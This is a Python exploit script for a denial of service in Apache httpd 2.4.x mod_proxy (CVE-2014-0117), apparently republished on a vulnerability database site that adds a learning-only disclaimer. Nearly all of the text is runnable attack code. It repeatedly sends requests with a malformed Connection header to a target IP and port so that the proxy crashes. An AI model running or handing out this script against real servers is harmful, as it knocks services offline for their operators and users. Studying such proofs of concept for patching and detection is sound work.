# Exploit Title: Apache 2.4.x mod_proxy Denial Of Service(CVE-2014-0117) # Date: 2014-07-20 # Exploit Author: aisyhi # Version: 0.1 # Apache httpd 2.4.6 to 2.4.9 # Tested on: Apache/2.4.7 # CVE : CVE-2014-0117 import httplib import logging import time import socket import sys import os debug = False socket.setdefaulttimeout(3) httplib.HTTPConnection.debuglevel = 1 if debug else 0 packet = 0 print "======================================================================" print u"Apache 2.4.x mod_proxy Denial Of Service(CVE-2014-0117)" print "======================================================================" if len(sys.argv) < 2: print "Usage: python CVE-2014-0117.py [target ip] [target port]\n" print "Example: python CVE-2014-0117 127.0.0.1\n" sys.exit(1) else: host = sys.argv[1].lower() try: port = int(sys.argv[2]) except: port = 80 while packet <= 10: try: con = httplib.HTTPConnection(host, port) con.putrequest('GET', '/') con.putheader('User-Agent', "curl/7.30.0") con.putheader('Accept', "*/*") con.putheader('Connection', ";") con.endheaders() except: print "Connection error!" sys.exit(1) try: resp = con.getresponse() print(resp.status, resp.reason) except socket.timeout: print "[*] Socket timeout?" except: print "[*] Knock knock, is anybody there ? (" + str(packet) + "/10)" packet = packet + 1 con.close() print "[+] Done!"
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论